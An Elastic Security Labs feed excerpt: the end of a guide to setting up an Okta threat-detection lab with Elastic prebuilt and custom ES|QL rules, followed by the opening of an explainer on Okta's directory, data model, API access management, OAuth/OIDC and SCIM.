<p><em>Image 8: Install Elastic Agent</em></p>
<h2>Create an Okta token</h2>
<p>At this point, we need an API key and an Okta system logs API URL for the integration setup. Thus, we must pivot to the Okta admin console to create the API token.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image5.png" alt="Access the Okta Admin console" /></p>
<p><em>Image 9: Access the Okta Admin console</em></p>
<p>From the Okta admin console, select the following:</p>
<ol>
<li>Security &gt; API &gt; Tokens</li>
<li>Select the “Create token” button</li>
</ol>
<p>In this instance, we name the API token “elastic”. Since my administrator account creates the token, it inherits the permissions and privileges of my account. In general, we recommend creating a separate user and scoping permissions according to the principle of least privilege (PoLP) for best security practices. I recommend copying the provided API token to the clipboard, as it is necessary for the Okta integration setup.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image16.png" alt="Copy your API token" /></p>
<p><em>Image 10: Copy your API token</em></p>
<p>We also need to capture the Okta API logs URL: our Okta HTTPS URL with the path <code>/api/v1/logs</code>, the system logs API endpoint.</p>
<p>For example: <code>https://{okta-subdomain}.okta.com/api/v1/logs</code></p>
<p>The Elastic Agent, using the Okta integration, will send requests to this API URL with our API token included in the authorization header of each request using Okta’s proprietary SSWS token scheme. With this information, we are ready to finalize our Okta integration setup in the Elastic Stack.</p>
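<p>As a minimal sketch of what such a request looks like (the subdomain and token below are hypothetical; the Elastic Agent performs the equivalent call on its configured polling interval):</p>

```python
from urllib.parse import urlencode

def build_logs_request(subdomain: str, token: str, since: str, limit: int = 100):
    """Build the URL and headers for an Okta System Log API call."""
    # The system logs endpoint lives under the org's Okta subdomain.
    url = f"https://{subdomain}.okta.com/api/v1/logs?" + urlencode(
        {"since": since, "limit": limit}
    )
    headers = {
        # Okta API tokens are sent with the SSWS authorization scheme.
        "Authorization": f"SSWS {token}",
        "Accept": "application/json",
    }
    return url, headers

# Hypothetical trial subdomain and token:
url, headers = build_logs_request("trial-123456", "00abc...", "2024-02-20T00:00:00Z")
```

<p>Sending this request with a real token returns a JSON array of system log events, the same data the integration streams into <code>logs-okta*</code>.</p>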
<h2>Add Okta integration requirements</h2>
<p>Pivoting back to the Okta integration setup in the Elastic Stack, it requires us to add the API token and the Okta System logs API URL as shown below. Aside from this, we change the “Initial Interval” from 24 hours to 2 minutes. This will help check for Okta logs immediately after we finish our setup.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image12.png" alt="Configure log collection" /></p>
<p><em>Image 11: Configure log collection</em></p>
<p>Once this information is submitted to the Okta integration setup, we can select the “Confirm incoming data” button to verify that logs are properly being ingested from the Elastic Agent.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image11.png" alt="Preview data from Okta" /></p>
<p><em>Image 12: Preview data from Okta</em></p>
<p>While we have confirmed that data is being ingested from the Elastic Agent, we must also confirm that Okta-specific logs are arriving. Take a moment to pivot back to Okta and change some settings in the admin console; this generates Okta system logs that the Elastic Agent will extract and ingest into our Elastic Stack. Once completed, we can leverage the Discover feature within Kibana to search for the Okta system logs that should have been generated.</p>
<p>The following query can help us accomplish this: <code>event.dataset:okta*</code></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image13.png" alt="Use Discover to explore your Okta data" /></p>
<p><em>Image 13: Use Discover to explore your Okta data</em></p>
<p>If you have managed to find Okta logs from this, then congratulations rockstar, you have successfully completed these steps:</p>
<ol>
<li>Signed up for Okta Workforce Identity with a trial license</li>
<li>Deployed a trial Elastic stack via cloud.elastic.co</li>
<li>Deployed an agent to your host of choice</li>
<li>Created an Okta policy</li>
<li>Set up the Okta integration</li>
<li>Created an Okta API token</li>
<li>Confirmed incoming data from our Elastic agent</li>
</ol>
<h2>Enable Okta detection rules</h2>
<p>Elastic has 1000+ pre-built detection rules not only for Windows, Linux, and macOS endpoints, but also for several integrations, including Okta. You can view our current existing Okta <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/okta">rules</a> and corresponding MITRE ATT&amp;CK <a href="https://mitre-attack.github.io/attack-navigator/#layerURL=https%3A%2F%2Fgist.githubusercontent.com%2Fbrokensound77%2F1a3f65224822a30a8228a8ed20289a89%2Fraw%2FElastic-detection-rules-indexes-logs-oktaWILDCARD.json&amp;leave_site_dialog=false&amp;tabs=false">coverage</a>.</p>
<p>To enable Okta rules, complete the following in the Elastic Stack:</p>
<ol>
<li>Navigation menu &gt; Security &gt; Manage &gt; Rules</li>
<li>Select “Load Elastic prebuilt rules and timeline templates”</li>
<li>Once all rules are loaded:
a. Select “Tags” dropdown
b. Search “Okta”
c. Select all rules &gt; Build actions dropdown &gt; Enable</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image15.png" alt="Searching for Out-of-the-Box (OOB) Okta Detection Rules" /></p>
<p><em>Image 14: Searching for Out-of-the-Box (OOB) Okta Detection Rules</em></p>
<p>While we won’t go in-depth about exploring all rule information, we recommend <a href="https://www.elastic.co/es/guide/en/security/current/detection-engine-overview.html">doing so</a>. Elastic has additional information, such as related integrations, investigation guides, and much more! Also, you can add to our community by <a href="https://www.elastic.co/es/guide/en/security/current/rules-ui-create.html">creating your own</a> detection rule with the “Create new rule” button and <a href="https://github.com/elastic/detection-rules#how-to-contribute">contribute</a> it to our detection rules repository.</p>
<h2>Let’s trigger a pre-built rule</h2>
<p>After all Okta rules have been enabled, we can now move on to testing alerts for these rules with some simple emulation.</p>
<p>For this example, let’s use the <a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml">Attempt to Reset MFA Factors for an Okta User Account</a> detection rule that comes fresh out-of-the-box (OOB) with prebuilt detection rules.</p>
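<p>For reference, the rule's detection logic amounts to a short KQL query along these lines (paraphrased from the rule file linked above; consult the repository for the exact, current version):</p>

```
event.dataset:okta.system and event.action:user.mfa.factor.reset_all
```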
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image15.png" alt="Enabling an OOB Okta detection rule to test alerting" /></p>
<p><em>Image 15: Enabling an OOB Okta detection rule to test alerting</em></p>
<p>To trigger the rule, we simply log into our Okta admin console and select a user of choice from Directory &gt; People and then More Actions &gt; Reset Multifactor &gt; Reset All.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image18.png" alt="Resetting MFA for a user in Okta" /></p>
<p><em>Image 16: Resetting MFA for a user in Okta</em></p>
<p>Once complete, logs will be ingested shortly into the Elastic Stack, and the Detection Engine will run the rule’s query against data streams whose patterns match <code>logs-okta*</code>. If all goes as expected, an alert should be available via the Security &gt; Alerts page in the Elastic Stack.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image1.png" alt="Alert page flyout for triggered OOB Okta detection rule" /></p>
<p><em>Image 17: Alert page flyout for triggered OOB Okta detection rule</em></p>
<h2>Let’s trigger a custom rule</h2>
<p>Not all OOB Okta rules may be right for your environment or detection lab. As a result, you may want to create custom detection rules for data from the Okta integration. Allow me to demonstrate how you would do this.</p>
<p>Let’s assume we have a use case where we want to identify when a unique user ID (Okta Actor ID) has an established session from two separate devices, indicating a potential web session hijack.</p>
<p>For this, we will rely on Elastic’s piped query language, <a href="https://www.elastic.co/es/blog/getting-started-elasticsearch-query-language">ES|QL</a>. We can start by navigating to Security &gt; Detection Rules (SIEM) &gt; Create new rules. We can then select ES|QL as the rule type.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image2.png" alt="Create new rule Kibana page in Elastic security solution" /></p>
<p><em>Image 18: Create new rule Kibana page in Elastic security solution</em></p>
<p>To re-create Okta system logs for this event, we would log in to Okta with the same account from multiple devices relatively quickly. For replication, I have done so via macOS and Windows endpoints, as well as my mobile phone, for variety.</p>
<p>The following custom ES|QL query would identify this activity, which we can confirm via Discover in the Elastic Stack before adding it to our new rule.</p>
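<p>As a sketch of the shape such a query can take (field names assumed from the Okta integration's ECS mappings; the device-token hash field in particular may vary by integration version):</p>

```esql
FROM logs-okta*
| WHERE event.dataset == "okta.system"
    AND okta.authentication_context.external_session_id IS NOT NULL
    AND okta.debug_context.debug_data.dt_hash IS NOT NULL
// count distinct device-token hashes observed per actor and session
| STATS device_count = COUNT_DISTINCT(okta.debug_context.debug_data.dt_hash)
    BY okta.actor.id, okta.authentication_context.external_session_id
// flag sessions seen from two or more distinct devices
| WHERE device_count >= 2
```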
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image6.png" alt="Testing ES|QL query in Elastic Discover prior to rule implementation" /></p>
<p><em>Image 19: Testing ES|QL query in Elastic Discover prior to rule implementation</em></p>
<p>Now that we have adjusted and tested our query and are happy with the results, we can set it as the query for our new rule.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image21.png" alt="Creating new custom detection rule with ES|QL query logic" /></p>
<p><em>Image 20: Creating new custom detection rule with ES|QL query logic</em></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image8.png" alt="Enabled custom detection rule with ES|QL query for Okta threat" /></p>
<p><em>Image 21: Enabled custom detection rule with ES|QL query for Okta threat</em></p>
<p>Now that our rule has been created, tested, and enabled, let’s attempt to fire an alert by replicating this activity. For this, we simply log into our Okta admin console with the same user account from multiple devices.</p>
<p>As we can see, we now have an alert for this custom rule!</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image4.png" alt="Triggered alert for events matching custom detection rule" /></p>
<p><em>Image 22: Triggered alert for events matching custom detection rule</em></p>
<h2>Bonus: synchronize Active Directory (AD)</h2>
<p>As discussed in our <a href="https://www.elastic.co/es/security-labs/starter-guide-to-understanding-okta">previous Okta installment</a>, a core service offering in Okta is to synchronize with third-party IAM directory services such as AD, Google Workspace, and others. Doing so in your lab can enable further threat detection capabilities, as cross-correlation between Windows logs and Okta users becomes possible. For this article, we will step through synchronizing with AD on a local Windows Server. Note: we recommend deploying a Windows Elastic Agent to your Windows Server and setting up the <a href="https://docs.elastic.co/en/integrations/windows">Windows</a> and <a href="https://www.elastic.co/es/guide/en/security/current/install-endpoint.html">Elastic Defend</a> integrations for additional log ingestion.</p>
<ol>
<li><a href="https://www.linkedin.com/pulse/how-install-active-directory-domain-services-windows-server-2019-/">Setup</a> your Windows Server (we are using WinServer 2019)</li>
<li>Deploy the Okta AD agent from your Okta admin console
a. Directory &gt; Directory Integrations
b. Add Directory &gt; Add Active Directory</li>
<li>Walk through guided steps to install Okta AD agent on Windows Server
a. Execution of the Okta Agent executable will require a setup on the Windows Server side as well</li>
<li>Confirm Okta AD agent was successfully deployed</li>
<li>Synchronize AD with Okta
a. Directory &gt; Directory Integrations
b. Select new AD integration
c. Select “Import Now”
d. Choose incremental or full import</li>
<li>Select which users and groups to import and import them</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image10.png" alt="Successful Okta agent deployment and synchronization with AD" /></p>
<p><em>Image 23: Successful Okta agent deployment and synchronization with AD</em></p>
<p>Once finished, under Directory in the Okta admin console, you should see people and groups that have been successfully imported. From here, you can emulate attack scenarios such as stolen login credentials locally (Windows host) being used to reset MFA in Okta.</p>
<h2>Additional considerations</h2>
<p>While this is a basic setup of the Elastic Stack, the Okta integration, and more for a threat research lab, there are additional considerations that depend on your research goals. While we won't dive into specifics or exhaust every possible scenario, below is a list of considerations for your lab to accurately emulate an enterprise environment and/or adversary playbooks:</p>
<ul>
<li>Is Okta my IdP source of truth? If not, set up a third party such as Azure AD (AAD) or Google Workspace and synchronize directory services.</li>
<li>Will I simulate adversary behavior - for example, SAMLjacking? If so, what third-party integrations do I need that leverage SAML for authentication?</li>
<li>Do I want to research tenant poisoning? If so, should I set up a multi-tenant architecture with Okta?</li>
<li>Do I need separate software, such as VPNs or proxies, to emulate attribution evasion when attempting to bypass MFA?</li>
<li>What other tools, such as EvilGinx, let me attempt phishing playbooks, and what is the required setup in Okta for these exercises?</li>
<li>How should I capture authorization codes during OAuth workflows, and how can I replay an exchange request for an access token?</li>
<li>For password spraying or credential stuffing, which third-party applications should I integrate, and how many should suffice for accurate detection logic?</li>
<li>How might I explore lax access policies for user profiles?</li>
</ul>
<h2>Takeaways</h2>
<p>In this guide, we've successfully navigated the setup of an Okta threat detection lab using the Elastic Stack, highlighting the importance of safeguarding SaaS platforms like Okta. Our journey included deploying the Elastic Stack, integrating and testing Okta system logs, and implementing both pre-built and custom detection rules.</p>
<p>The key takeaway is the Elastic Stack's versatility in threat detection, accommodating various scenarios, and enhancing cybersecurity capabilities. This walkthrough demonstrates that effective threat management in Okta environments is both achievable and essential.</p>
<p>As we wrap up, remember that the true value of this exercise lies in its practical application. By establishing your own detection lab, you're not only reinforcing your security posture but also contributing to the broader cybersecurity community. Stay tuned for additional threat research content surrounding SaaS and Okta, where we'll explore common adversary attacks against Okta environments and detection strategies.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/photo-edited-03.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Starter guide to understanding Okta]]></title>
            <link>https://www.elastic.co/es/security-labs/starter-guide-to-understanding-okta</link>
            <guid>starter-guide-to-understanding-okta</guid>
            <pubDate>Tue, 23 Jan 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[This article delves into Okta's architecture and services, laying a solid foundation for threat research and detection engineering. Essential reading for those aiming to master threat hunting and detection in Okta environments.]]></description>
            <content:encoded><![CDATA[<h1>Preamble</h1>
<p>The evolution of digital authentication from simple, unencrypted credentials to today’s advanced methods underscores the importance of data security. As organizations adapt to hybrid deployments and application access moves beyond the network perimeter, authentication complexity and risk follow. The adoption of standard authentication protocols and advanced workflows is mandatory not only to reduce risk but also to maintain operational stability for users who require access to various applications. Okta provides solutions to these inherent industry problems with its comprehensive SaaS platform for Identity and Access Management (IAM) services.</p>
<p>We will examine Okta's services and solutions in the context of Software-as-a-Service (SaaS) platforms and against the backdrop of the broader threat landscape. We'll explore historical and potential vulnerabilities to understand their origins and impacts. This article will provide insights into:</p>
<ul>
<li>Universal Directory (UD)</li>
<li>Data Model</li>
<li>API Access Management</li>
<li>Access Policies</li>
<li>Session Management</li>
<li>Tenants</li>
<li>Authorization Workflows</li>
<li>Authentication Workflows</li>
</ul>
<p>With a deeper understanding of Okta, security practitioners may leverage this knowledge to accurately assess attack surfaces where Okta is deployed.</p>
<h1>Okta's offerings</h1>
<h2>Overview of core services</h2>
<p>In this introduction, we delve into the core services provided by Okta. Primarily, Okta is a SaaS platform, specializing in scalable Identity and Access Management (IAM) solutions. Central to its offerings are technologies such as Single Sign-On (SSO), Multi-Factor Authentication (MFA), and support for complex multi-tenant architectures. Okta also boasts a robust suite of RESTful APIs, facilitating seamless Create, Read, Update, and Delete (CRUD) operations.</p>
<p>At the heart of Okta’s IAM solutions lie users, groups, and policies. The platform provides comprehensive lifecycle management and a UD, allowing seamless IAM across hybrid environments encompassing applications, devices, and more. This includes synchronization capabilities with external directories like LDAP or Active Directory (AD), ensuring a unified identity management system.</p>
<p>A key aspect of Okta's service is its dual role as both a Service Provider (SP) and an Identity Provider (IdP). This dual functionality enables Okta to facilitate secure and seamless authentication via its <a href="https://help.okta.com/oie/en-us/content/topics/identity-engine/oie-index.htm">Identity Engine</a>, and robust authorization using standard protocols such as OAuth, while also supporting authentication protocols such as Security Assertion Markup Language (SAML) and OpenID Connect (OIDC).</p>
<p>For customers, Okta offers valuable tools for security and compliance. <a href="https://developer.okta.com/docs/api/openapi/okta-management/management/tag/SystemLog/">System logs</a>, environment-based events that are stored and retrievable via API, provide insights into user activities and organizational events. These logs are crucial for Security Information and Event Management (SIEM) systems, aiding in the detection of anomalies and potential threats.</p>
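<p>As a sketch of how a defender might pull these events, the following builds (but does not send) a System Log query; the domain and API token are placeholder values, and the <code>filter</code> expression is one illustrative sign-on hunt:</p>

```python
import urllib.parse
import urllib.request

# System Log query built, not sent; domain and token are placeholders.
params = urllib.parse.urlencode({
    "filter": 'eventType eq "user.session.start"',  # e.g. hunt for sign-on events
    "limit": "100",
})
req = urllib.request.Request(
    "https://example.okta.com/api/v1/logs?" + params,
    headers={"Authorization": "SSWS REPLACE_WITH_API_TOKEN"},
)
```

<p>Shipping the resulting JSON events into a SIEM is what enables the anomaly detection described above.</p>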
<p>Additionally, Okta's <a href="https://help.okta.com/en-us/content/topics/security/threat-insight/about-threatinsight.htm">ThreatInsight</a> feature stands out as a proactive security measure. It aggregates and analyzes system logs, dynamically identifying and responding to potential threats. This includes recognizing patterns indicative of malicious activities such as password spraying, credential stuffing, and detecting suspicious IP addresses. These features collectively enhance the security posture of organizations, fortifying them against a wide array of cyber threats.</p>
<h2>Integration capabilities</h2>
<p>Beyond the offerings above, Okta is developer-friendly and designed to interoperate with other SaaS solutions and applications. Out of the box, Okta provides an <a href="https://www.okta.com/integrations/">integration network</a> that allows seamless integration with applications such as Slack, Google Workspace, Office 365, GitHub, and many more.</p>
<p>Okta’s <a href="https://developer.okta.com/docs/reference/core-okta-api/">RESTful APIs</a> follow the System for Cross-domain Identity Management (<a href="https://datatracker.ietf.org/doc/html/rfc7644">SCIM</a>) protocol. This allows for straightforward Create, Read, Update, and Delete (CRUD) operations on users and groups by applications or developers, but also enables standardization within the SaaS ecosystem. SCIM is a pivotal component of Okta's scalability. As businesses expand, the need to integrate an increasing number of users, groups, and access controls across various SaaS platforms grows. SCIM addresses this challenge by standardizing how user identity data is communicated between these platforms. This standardization facilitates the process of user management, especially in synchronizing user information across different systems.</p>
<p>Okta’s object management regarding APIs is focused on several domains listed below:</p>
<ul>
<li>Apps API - Manage applications and their association with users and groups.</li>
<li>Users API - CRUD operations on users.</li>
<li>Sessions API - Creates and manages user’s authentication sessions.</li>
<li>Policy API - Creates and manages settings such as a user’s session lifetime.</li>
<li>Factors API - Enroll, manage, and verify factors for MFA.</li>
<li>Devices API - Manage device identity and lifecycles.</li>
</ul>
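<p>To make the CRUD mapping concrete, here is a minimal sketch that builds (but does not send) authenticated requests against the Users API; the org domain and token are placeholders, and <code>{userId}</code> is the documented path template:</p>

```python
import urllib.request

# Placeholders: substitute your Okta org domain and an API token.
OKTA_DOMAIN = "https://example.okta.com"
API_TOKEN = "REPLACE_WITH_API_TOKEN"

def build_request(method, path):
    """Build (but do not send) an authenticated Okta API request."""
    return urllib.request.Request(
        OKTA_DOMAIN + path,
        method=method,
        headers={
            "Authorization": "SSWS " + API_TOKEN,  # Okta's API-token scheme
            "Accept": "application/json",
        },
    )

# CRUD operations map onto standard HTTP verbs:
list_users = build_request("GET", "/api/v1/users")               # Read
create_user = build_request("POST", "/api/v1/users")             # Create
deactivate = build_request("POST", "/api/v1/users/{userId}/lifecycle/deactivate")
delete_user = build_request("DELETE", "/api/v1/users/{userId}")  # Delete
```

<p>The same pattern applies to the other endpoint families listed above; only the paths change.</p>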
<p>When integrations are added to an Okta organization, authentication policies, both fine-grained and global, can be set up for access control based on end-user attributes stored within the user’s Okta profile.</p>
<h1>Universal directory</h1>
<p>At the core of Okta’s user, group, policy, and device management is the <a href="https://www.okta.com/products/universal-directory">UD</a>. This is a single pane view of all assets, whether sourced from Okta, an integration, or a secondary directory service such as AD.</p>
<p>The UD is technically an Okta-managed, centralized, and cloud-based repository for all user, group, device, and policy profiles. Okta is either the source of truth regarding IAM or synchronizes with other federation services and identity providers such as AD or Google Workspace. The UD is accessible behind Okta’s core APIs for CRUD operations and used in conjunction with their single sign-on (SSO) platform, thus providing authentication and authorization to linked integrations or the admin console itself. Everything from user management to streamlined password management is enabled by the UD.</p>
<p>In short, the UD is a directory-as-a-service (<a href="https://jumpcloud.com/daas-glossary/directory-as-a-service-daas">DaaS</a>), similar to AWS Directory Service, Microsoft Entra ID, and many others.</p>
<h2>Customization and management</h2>
<p>Adding a bit more depth to the UD, profiles are customizable. This enables an organization to store a record of information regarding users and groups that contains specific attributes. Base attributes are assigned by Okta, but custom attributes can be added as well across user, group, and app <a href="https://developer.okta.com/docs/concepts/user-profiles/">user profiles</a>. Attribute mappings are important for synchronization and data exchanges between integrations and other directory services. For example, the AD attributes givenName and sn can be mapped to firstName and lastName in Okta. Aside from synchronization, this is important for other Okta-related features such as <a href="https://developer.okta.com/docs/concepts/inline-hooks/">inline hooks</a>, directory rules and actions, and more.</p>
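<p>A toy version of such a mapping is shown below; the attribute pairs are illustrative examples, since real mappings are configured in Okta's profile editor rather than in code:</p>

```python
# Illustrative AD-to-Okta attribute mapping; real mappings are configured in
# Okta's profile editor, and the pairs below are examples, not a fixed schema.
AD_TO_OKTA = {
    "givenName": "firstName",
    "sn": "lastName",
    "mail": "email",
    "sAMAccountName": "login",
}

def map_profile(ad_attrs):
    """Translate AD attribute names into Okta profile attribute names."""
    return {okta: ad_attrs[ad] for ad, okta in AD_TO_OKTA.items() if ad in ad_attrs}

profile = map_profile({"givenName": "Ada", "sn": "Lovelace", "mail": "ada@example.com"})
```

<p>Attributes absent from the source record are simply skipped, mirroring how unmapped attributes are left unset during synchronization.</p>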
<p>Additionally, this enables rich SAML assertions and <a href="https://auth0.com/docs/authenticate/protocols/ws-fed-protocol">WS-Federation</a> claims where applications can utilize this information to create rich user accounts, update accounts, or create complex authorization and authentication decisions.</p>
<p>There are additional <a href="https://help.okta.com/en-us/content/topics/provisioning/lcm/con-okta-prov.htm">autonomous provisioning and deprovisioning</a> options available as well with the UD and internal profiles, important for scalability and administrative tasks such as controlling which user types can access which applications, thus enabling more traditional role-based access control (RBAC) policies.</p>
<h2>Integration with external directories</h2>
<p>As mentioned previously, the Okta <a href="https://www.okta.com/resources/whitepaper/ad-architecture/">Directory Integration</a> can synchronize with external directories such as LDAP, AD, Google Workspace and others. For cloud-based DaaS platforms, Okta leverages RESTful APIs and the SCIM protocol to perform data exchanges and more. For on-premise environments, Okta has an AD <a href="https://help.okta.com/en-us/content/topics/directory/ad-agent-new-integration.htm">endpoint agent</a> that can be deployed and thus pulls information from directory services and ships it back to the UD.</p>
<p>Alternatively, Desktop SSO (DSSO) provides an <a href="https://help.okta.com/en-us/content/topics/directory/configuring_agentless_sso.htm">agentless</a> option as well. This supplies flexibility to cloud, on-premises, or hybrid environments while preserving scalability and direct integration with 3rd-party applications. Architecturally, this solves many pitfalls of LAN-based environments, where applications are served to domain users behind a firewall. From a security perspective, credentials and profiles are synchronized from all application directories into a single “source-of-truth”: Okta. Auditing a single directory is also far more approachable in situations where, for example, a departing employee's access across various applications must be deactivated. Single Log-Off (<a href="https://help.okta.com/en-us/content/topics/apps/apps_single_logout.htm">SLO</a>) is available for such situations thanks to these external directory integration capabilities.</p>
<p>Finally, we must not overlook the amount of maintenance this potentially reduces for organizations who may not have the resources to manage SAML, OAuth, and SCIM communications between RESTful APIs or compatibility issues between integrations as Okta manages this for them.</p>
<p>Additional solutions and examples of Okta providers with external directory support for AD can be found <a href="https://www.okta.com/resources/whitepaper/ad-architecture/">here</a>.</p>
<h1>Data model</h1>
<p>As we traverse through the Okta landscape, understanding Okta’s <a href="https://developer.okta.com/docs/concepts/okta-data-model/">data models</a> is important to security practitioners who may be tasked with threat hunting, detection logic, and more.</p>
<h2>Structure and design</h2>
<p>When Okta is first established for an organization, it inherits its own “space” where applications, directories, user profiles, authentication policies, and more are housed. A top-level directory resource is given as a “base” for your organization where entities can be sourced from Okta or externally (LDAP, AAD, Google Workspace, etc.).</p>
<p>Okta users are higher-privileged users who typically leverage the Okta <a href="https://help.okta.com/en-us/content/topics/dashboard/dashboard.htm">admin console</a> and perform administrative tasks, while end users are those who may rely on Okta for SSO, access to applications and more.</p>
<p>By default, entities in Okta are referred to as resources. Each resource has a combined set of default and custom attributes as discussed before. Links then describe relationships or actions that are acceptable for a resource, such as a deactivation link. This information is aggregated into a profile accessible from within the UD. Groups act as labels applied to specific sets of users.</p>
<p>Applications hold information about policies for access related to users and groups, as well as how to communicate with each integrated application. Together, the data stored about application access and related users is stored as an <a href="https://support.okta.com/help/s/article/The-Okta-User-Profile-And-Application-User-Profile?language=en_US">AppUser</a> and if mapping is done correctly between directories, enables access for end users.</p>
<p>A policy contains a set of conditions and rules that affect how an organization behaves with applications and users. Policies are all-encompassing in Okta, meaning they are used for making decisions and completing actions such as what is required for a password reset or how users enroll in MFA. These rules can be expressed using the Okta Expression Language (<a href="https://developer.okta.com/docs/reference/okta-expression-language-in-identity-engine/">OEL</a>).</p>
<p>Dedicated <a href="https://developer.okta.com/docs/concepts/auth-servers/">authorization servers</a> are used per organization to provide authorization codes and tokens for access to applications by API or resources. Here, authorization and authentication protocols such as OAuth, OIDC, and SAML are vital for workflows. These authorization servers are also responsible for communication with third-party IdPs such as Google Workspace. End users seeking access to applications take part in rapid exchanges of codes and tokens between authorization servers and SPs that confirm authorization and authentication.</p>
<p>Altogether, this structure and design support scalability, customization, and seamless integration.</p>
<h1>API access management</h1>
<p>API access management is not only important for end users, administrators, and developers but also for integration-to-integration communication. Remember that at the forefront of Okta are its various RESTful <a href="https://developer.okta.com/docs/reference/core-okta-api/#manage-okta-objects">API endpoints</a>.</p>
<p>While we won’t dive deep into the design principles and object management of Okta’s APIs, we will attempt to discuss core concepts that are important for understanding attack surfaces later in this blog series.</p>
<h2>API Security</h2>
<h3>OAuth 2.0 and OIDC implementation</h3>
<p>Understanding the core protocols of <a href="https://auth0.com/docs/authenticate/protocols/oauth">OAuth</a> and <a href="https://auth0.com/docs/authenticate/protocols/openid-connect-protocol">OIDC</a> is key before exploring various authorization and authentication workflows. OAuth, an open standard for delegated authorization in RESTful APIs, operates over HTTPS, enabling secure, delegated access using access tokens instead of credentials. These tokens, cryptographically signed by the Identity Provider (IdP), establish a trust relationship, allowing applications to grant user access. The typical OAuth workflow involves user access requests, user authentication, proof-of-authorization code delivery, and token issuance for API requests. Access tokens are verified with the IdP to determine access scope.</p>
<p>OIDC (<a href="https://developer.okta.com/docs/reference/api/oidc/#endpoints">API endpoints</a>) builds upon OAuth for authentication, introducing identity-focused scopes and an ID token in addition to the access token. This token, a JSON Web Token (<a href="https://developer.okta.com/blog/2020/12/21/beginners-guide-to-jwt">JWT</a>), contains identity information and a signature, crucial for SSO functionality and user authentication. Okta, as a certified OIDC provider, leverages these endpoints, especially when acting as an authorization server for Service Providers (SPs).</p>
<p>Demonstrating Proof-of-Possession (<a href="https://developer.okta.com/docs/guides/dpop/main/#oauth-2-0-dpop-jwt-flow">DPoP</a>) is crucial in this context, enhancing security by preventing misuse of stolen tokens through an application-level mechanism. It involves a public/private key pair where the public key, embedded in a JWT header, is sent to the authorization server. The server binds this public key to the access token, ensuring secure communication primarily between the user’s browser and the IdP or SP.</p>
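<p>The shape of a DPoP proof can be sketched with the standard library; the JWK values are placeholders, the target URI is hypothetical, and the signature step is omitted, so this is an illustration of the structure rather than a working proof:</p>

```python
import base64
import json
import time
import uuid

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Header carries the client's public key (a dummy JWK here) so the server can
# bind the key to the access token it issues; key values are placeholders.
header = {"typ": "dpop+jwt", "alg": "ES256",
          "jwk": {"kty": "EC", "crv": "P-256", "x": "PLACEHOLDER", "y": "PLACEHOLDER"}}
payload = {
    "htm": "POST",                                      # HTTP method being proven
    "htu": "https://example.okta.com/oauth2/v1/token",  # target URI
    "iat": int(time.time()),                            # issued-at
    "jti": str(uuid.uuid4()),                           # unique per proof
}
signing_input = b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(payload).encode())
# A real DPoP proof appends a signature over signing_input made with the private key.
```

<p>Because the proof is bound to a specific method, URI, and key, a stolen access token alone is insufficient to replay the request.</p>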
<p><a href="https://developer.okta.com/docs/guides/tokens/">Tokens</a> and API keys in Okta’s API Access Management play a vital role, acting as digital credentials post-user authentication. They are transmitted securely via HTTPS and have a limited lifespan, contributing to a scalable, stateless architecture.</p>
<p>Lastly, understanding End-to-End Encryption (E2EE) is essential. E2EE ensures that data is encrypted at its origin and decrypted only by the intended recipient, maintaining security and privacy across the ecosystem. This encryption, using asymmetric cryptography, is a default feature within Okta’s APIs, safeguarding data across applications, browsers, IdPs, and SPs.</p>
<h2>RESTful API and CRUD</h2>
<p>Okta's RESTful API adheres to a standardized interface design, ensuring uniformity and predictability across all interactions. This design philosophy facilitates CRUD (Create, Read, Update, Delete) operations, making it intuitive for developers to work with Okta's API. Each <a href="https://developer.okta.com/docs/reference/core-okta-api/">API endpoint</a> corresponds to standard HTTP methods — POST for creation, GET for reading, PUT for updating, and DELETE for removing resources. This alignment with HTTP standards simplifies integration and reduces the learning curve for new developers.</p>
<p>A key feature of Okta's RESTful API is its statelessness — each request from client to server must contain all the information needed to understand and complete the request, independent of any previous requests. This approach enhances scalability, as it allows the server to quickly free resources and not retain session information between requests. The stateless nature of the API facilitates easier load balancing and redundancy, essential for maintaining high availability and performance even as demand scales.</p>
<h2>SCIM</h2>
<p>SCIM (System for Cross-domain Identity Management) is an open standard that automates user identity management across various cloud-based applications and services. Integral to Okta's API Access Management, SCIM ensures seamless, secure user data exchange between Okta and external systems. It standardizes identity information, which is essential for organizations using multiple applications, reducing complexity and manual error risks.</p>
<p>Within Okta, SCIM’s role extends to comprehensive user and group management, handling essential attributes like usernames, emails, and group memberships. These are key for access control and authorization. Okta’s SCIM implementation is customizable, accommodating the diverse identity management needs of different systems. This adaptability streamlines identity management processes, making them more automated, efficient, and reliable - crucial for effective API access management.</p>
